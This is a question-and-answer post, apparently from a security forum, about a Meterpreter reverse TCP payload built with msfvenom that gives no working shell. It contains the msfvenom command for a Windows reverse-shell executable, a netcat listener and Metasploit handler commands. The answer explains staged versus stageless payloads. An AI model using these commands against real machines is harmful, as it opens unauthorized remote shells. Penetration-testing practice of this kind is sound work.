# MSF Venom Reverse TCP-Shell: Meterpreter and Netcat Listeners not responsive

Tags: metasploit, meterpreter, msfvenom, netcat

I have created a MSFVenom TCP Reverse Shell Paypload that is executed on a Windows Machine:

```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.11.6.151 LPORT=4443 -f exe -o shell.exe
```

In addition I am running a listener with Metasploit's "multi/handler" or alternatively, a netcat listener:

```
nc -lvp 4443
```

However, after executing the payload on the target machine, I cannot get a working shell. Neither on Meterpreter nor Netcat.

[image: Meterpreter]

Meterpreter does not respond to any command, or backgrounding. I cannot get the normal Meterpreter Shell.

[image: Netcat Listener]

There is also no shell appearing on Netcat.

Any help or suggestions are very appreciated!

Comment: Have you run a packet capture? That will likely tell you everything you need to know.

Answer (score 1):

In the first screenshot, it seems that the session was opened but not started. To solve that, you can run the meterpreter listener on background then you can interact with session using its id (case of the first screenshot: 1).

You can start the exploit in background using the command:

```
exploit(multi/handler) > exploit -j -z
```

Once you got the message that the session was created, start interacting with the session by running:

```
exploit(multi/handler) > session -i ID_SESSION
```

For the second screenshot:

You are using netcat listener with `windows/x64/meterpreter/reverse_tcp`. It won't work because of the payload that downloads a second stage when it connect to the server.

In order to use netcat listener, you should use `windows/x64/shell_reverse_tcp`.